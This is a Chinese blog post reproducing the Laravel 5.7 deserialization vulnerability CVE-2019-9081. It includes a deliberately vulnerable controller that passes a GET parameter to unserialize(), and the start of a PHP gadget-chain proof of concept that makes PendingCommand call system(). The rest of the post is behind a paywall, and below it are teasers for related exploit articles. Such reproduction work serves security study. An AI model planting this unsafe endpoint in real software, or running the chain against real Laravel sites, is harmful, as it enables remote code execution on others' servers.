CVE-2019-9081--laravel5.7 反序列化漏洞复现

最新推荐文章于 2025-07-19 20:42:55 发布
原创 最新推荐文章于 2025-07-19 20:42:55 发布 · 950 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#cve

本文详细介绍了Laravel 5.7框架中的一个反序列化漏洞,通过分析代码流程,展示了如何构造POC以触发该漏洞,涉及 PendingCommand 类的 __destruct 方法和代码执行。在复现过程中,利用了 GenericUser 和 DefaultGenerator 类的 __get 魔术方法来绕过限制,最终实现代码执行。文章还提供了相关参考链接以便进一步研究。

目录​​​​​​​

简介:

环境部署:

分析:

参考文章:

简介:

和yii一样,Laravel也是一套简洁、优雅的PHPWeb开发框架(PHP Web Framework)。

 在laravel框架中没有找到合适的触发点,因此需要对基于laravel v5.7框架进行二次开发的cms进行再次审计,寻找可控的反序列化点,才能触发该漏洞。

环境部署:

去github上下载文件:

https://github.com/laravel/laravel/tree/5.7

下载的文件放在phpstudy的WWW目录下,由于没有vendor目录,需要在根目录执行命令:

composer install

我们需要自己构造一个漏洞demo,用作poc的验证。 

 构造一个反序列化的利用点,在routes/web.php里面加一条路由:

Route::get('/unserialize',"UnserializeController@uns");

在App\Http\Controllers下面写一个控制器UnserializeController.php文件: 

<?php

namespace App\Http\Controllers;

class UnserializeController extends Controller
{
    public function uns(){
        if(isset($_GET['c'])){
            unserialize($_GET['c']);
        }else{
            highlight_file(__FILE__);
        }
        return "uns";
    }
}

分析:

使用的poc:

<?php
namespace Illuminate\Foundation\Testing{

    use Illuminate\Auth\GenericUser;
    use Illuminate\Foundation\Application;

    class PendingCommand
    {
        protected $command;
        protected $parameters;
        public $test;
        protected $app;
        public function __construct(){
            $this->command="system";
            $this->parameters[]="dir";
            $this->test=new GenericUser();
            $this->app=new Application();
        }
    }
}
namespace Illuminate\Foundation{
    class Application{
        protected $bindings = [];
        public function __construct(){
            $this->bindings=array(
                'Illuminate\Contracts\Console\Kernel'=>array(
                    'concrete'=>'Illuminate\Foundation\Application'
                )
            );
        }
    }
}
namespace Illuminate\Auth{
    class GenericUser
    {
        protected $attributes;
        public function __construct(){
            $this->attributes['expectedO
最低0.47元/天 解锁文章
laravel5.8 反序列化漏洞复现
feng的博客
02-17 1993
前言 上一篇文章复现了一下laravel5.7反序列化,这篇复现一下5.8的反序列化。还是github上下载源码: laravel5.8 往composer.json的require里面加上"symfony/symfony": “4.*”,然后composer update。 如果提示 Allowed memory size of bytes exhausted,参考这篇文章: 运行 composer update,提示 Allowed memory size of bytes exhausted 然后还
Laravel5.7反序列化漏洞(CVE-2019-9081)
byname1的博客
03-30 1493
this->instances[$abstract]为一个application对象的话既满足了return的条件:又能返回一个application对象。这个就轻松多了,直接:这样的话就直接返回了一个application对象来调用call,我们继续跟进一下call方法。
Laravel5.7(CVE-2019-9081)反序列化漏洞分析与复现
weixin_45678034的博客
01-04 4406
前言 在做题的时候遇到了这题,所以便来学习一下这个漏洞的原理,因为还是个萌新看文章时有一些地方不是特别理解,所以便来手动调试一下 环境搭建 我采用的是vscode+phpstudy+php7.3.4+xdebug,一开始的默认调试时间太过于短暂,不方便跟踪,可以参考这篇文章修改超时时间 https://blog.csdn.net/weixin_43888304/article/details/120802226。 在自己的网站文件夹下使用composer下载Laravel5.7 composer creat
Laravel RCE(CVE-2021-3129)漏洞复现
深耕网络安全领域,聚焦护网行动(HW)、渗透测试、等级保护(等保)、CTF 竞赛四大核心方向,提供技术干货、实战经验与行业洞察。
07-13 4083
Laravel框架简介 Laravel是一套简洁、优雅的PHP Web开发框架(PHP Web Framework)。它可以让你从面条一样杂乱的代码中解脱出来;它可以帮你构建一个完美的网络APP,而且每行代码都可以简洁、富于表达力。 在Laravel中已经具有了一套高级的PHP ActiveRecord实现 – Eloquent ORM。它能方便的将“约束(constraints)”应用到关系的双方,这样你就具有了对数据的完全控制,而且享受到ActiveRecord的所有便利。Eloquent原生支持Flu
精选资源
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。...
weblogic反序列化漏洞(绕过CVE-2019-2725)-检测POC .txt
06-27
weblogic反序列化漏洞(绕过CVE-2019-2725)-检测POC .网上几乎没有,请珍惜。
精选资源
CVE-2019-11708:针对Windows 64位版本的Firefox的完整漏洞利用链(CVE-2019-11708和CVE-2019-9810)
02-04
CVE-2019-11708和CVE-2019-9810的全链漏洞利用 这是针对Windows 64位Firefox的完整的浏览器入侵漏洞利用链(CVE-2019-11708和CVE-2019-9810)。 它使用CVE-2019-9810在内容流程以及父流程中获取代码执行,并使用CVE-...
Laravel 9.1.8 反序列化漏洞分析及复现
qq_54502707的博客
12-10 4101
反序列化漏洞是如今很常见的漏洞类型,有很多分类,也有很多绕过方式。本文选取了一个今年比较典型的反序列化漏洞,进行了一个分析并复现
Laravel Debug mode RCE(CVE-2021-3129)漏洞复现
黑白的博客
05-02 1754
声明 好好学习,天天向上 漏洞描述 Laravel是一套简洁、开源的PHP Web开发框架,旨在实现Web软件的MVC架构。 Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。 影响范围 Laravel <= 8.4.2 Ignition <2.5.2 复现过程 这里使用
Laravel 远程代码执行漏洞(CVE-2021-3129)复现
oiadkt的博客
04-24 7157
Laravel 远程代码执行漏洞(CVE-2021-3129)
e7xue.php漏洞_Laravel5.7反序列化漏洞之RCE链挖掘
weixin_39821035的博客
12-21 371
在前一阵的 2019强网杯线下赛 中,出现一道 Laravel5.7 RCE 漏洞的利用。之前有关注过这个漏洞,但没细究。比赛期间,原漏洞作者删除了详细的分析文章,故想自己挖掘这个漏洞利用链。本文将详细记录 Laravel5.7 反序列化漏洞RCE链 的挖掘过程。漏洞环境直接使用 composer 安装 laravel5.7 框架,并通过 php artisan serve 命令启动 Web 服务...
laravel5.8反序列化漏洞(详细)
qq_61991235的博客
03-18 4692
#laravel5.8反序列化漏洞 添加反序列化入口点 添加路由 在routes/web.php中添加一条路由,这样就可以配合控制器传参了在http://127.0.0.1/la5.8/public/unserialize?c中传参了 Route::get("/unserialize","\App\Http\Controllers\DemoController@unserialize"); 添加控制器 在app/http/controllers目录下创建控制器,即添加一个为unController.php
Laravel LaRecipe renderBlade 未授权 代码注入漏洞 (CVE-2025-53833)完整复现指南
最新发布
AKM4180的博客
07-19 1201
Laravel LaRecipe 文档系统存在严重代码注入漏洞(CVE-2025-53833),该漏洞源于renderBlade方法未对用户输入进行过滤,导致攻击者可通过Blade模板引擎执行任意PHP代码。本文提供了完整的漏洞复现指南,包括Docker环境搭建脚本、漏洞验证方法(如触发phpinfo())以及获取系统shell的步骤。分析指出漏洞核心在于HasBladeParser Trait中的renderBlade()方法未正确处理用户输入,允许通过构造恶意文档内容实现远程代码执行。环境搭建使用PHP
laravel5.7 反序列化漏洞复现
feng的博客
02-17 2388
前言 之前接触yii2,接下来就遇到laravel5.7反序列化了,复现了一下laravel5.7反序列化链,学习了一波。 去github上下载源码: laravel5.7,下载下来的可能回没有vendor目录,需要在根目录执行composer install就可以了。 ...
漏洞复现CVE-2021-3129_laravel远程代码执行漏洞_写入木马getshell
serendipity1130的博客
09-09 3049
1.
利用POC检测WebLogic反序列化漏洞CVE-2019-2725
2019年,Oracle WebLogic服务器遭遇了一个严重的反序列化漏洞,即CVE-2019-2725。这个漏洞允许攻击者通过精心构造的恶意请求,利用WebLogic应用程序中的序列化功能来执行任意代码,从而获取系统控制权限。由于其...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值